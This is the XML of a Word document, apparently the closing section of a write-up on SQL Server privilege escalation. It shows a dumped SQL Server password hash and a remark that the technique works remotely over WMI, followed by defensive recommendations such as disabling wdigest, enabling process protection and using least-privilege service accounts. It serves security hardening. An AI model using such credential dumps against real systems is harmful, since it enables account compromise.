        <w:t>PasswordHash        : 0x0200698883dbec3fb88c445d43b99794043453384d13659ce72fc907af5a34534563c1624d935279f6447be9ec44467d4d1ef56d8e14a91fe183450520f560c2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>[TRUNCATED]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r w:rsidRPr="00FD5887">
        <w:t>Note: Mike also mentioned that it’s been working well remotely over WMI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7"/>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>General Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Below are some basic recommendations that can be used to reduce the risk of the common escalation techniques outlined above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Upgrade to Windows Server 2012 or greater to support common OS controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Upgrade to SQL Server 2012 or greater to support common SQL Server controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Do not allow the storage of wdigest passwords in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Do enable process protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Do use managed service accounts for standalone SQL Servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Do use least privilege domain accounts for clustered SQL Servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Run separate SQL Server services under separate Windows accounts. Whenever possible, use separate, low-rights Windows or Local user accounts for each SQL Server service.” For more information, see </w:t>
      </w:r>
      <w:r w:rsidRPr="00362358">
        <w:t>https://docs.microsoft.com/en-us/sql/sql-server/install/security-considerations-for-a-sql-server-installation#isolated_services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B94FC7" w:rsidRDefault="00B94FC7" w:rsidP="00B94FC7">
      <w:r>
        <w:t>Consider running endpoint protection that can identify common remote code injection techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C355D5" w:rsidRPr="00B94FC7" w:rsidRDefault="00C355D5">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00C355D5" w:rsidRPr="00B94F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897" w:rsidRDefault="00E63897" w:rsidP="00B94FC7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E63897" w:rsidRDefault="00E63897" w:rsidP="00B94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897" w:rsidRDefault="00E63897" w:rsidP="00B94FC7">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E63897" w:rsidRDefault="00E63897" w:rsidP="00B94F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50C"/>
    <w:rsid w:val="00B8650C"/>
    <w:rsid w:val="00B94FC7"/>
    <w:rsid w:val="00C355D5"/>
    <w:rsid w:val="00E6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756885-9612-47CB-9784-D5F614C0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F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4F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4F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4F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4F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1213</Words>
  <Characters>6920</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>57</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2020-02-21T09:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-21T09:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>